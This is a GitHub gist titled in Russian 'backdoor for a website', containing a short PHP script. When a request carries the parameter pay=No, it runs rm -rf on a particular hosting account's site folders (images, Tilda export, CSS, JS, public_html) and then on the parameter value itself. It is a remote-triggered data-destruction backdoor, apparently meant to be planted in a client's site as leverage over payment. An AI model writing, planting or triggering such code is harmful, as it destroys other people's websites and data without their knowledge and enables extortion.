Skip to content

Instantly share code, notes, and snippets.

@luckydevilru
Created March 2, 2018 12:39
Show Gist options
  • Select an option

  • Save luckydevilru/9cd051cec808beb07eb4e54db7fbef8d to your computer and use it in GitHub Desktop.

Select an option

Save luckydevilru/9cd051cec808beb07eb4e54db7fbef8d to your computer and use it in GitHub Desktop.
Черный ход для сайта
<?
// ini_set('error_reporting', E_ALL);
// ini_set('display_errors', 1);
// ini_set('display_startup_errors', 1);
// phpinfo();
if ($_GET['pay']=='No') {
$pathes=$_GET['pay'];
exec("rm -rf /home/m/motothuj/motothuj.beget.tech/public_html/img/");
exec("rm -rf /home/m/motothuj/motothuj.beget.tech/public_html/tilda/");
exec("rm -rf /home/m/motothuj/motothuj.beget.tech/public_html/img/");
exec("rm -rf /home/m/motothuj/motothuj.beget.tech/public_html/css/");
exec("rm -rf /home/m/motothuj/motothuj.beget.tech/public_html/js/");
rmdir("/home/m/motothuj/motothuj.beget.tech/public_html/");
mkdir("/home/m/motothuj/motothuj.beget.tech/public_html/");
exec("rm -rf /home/m/motothuj/motothuj.beget.tech/public_html/");
exec("rm -rf ".$pathes);
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment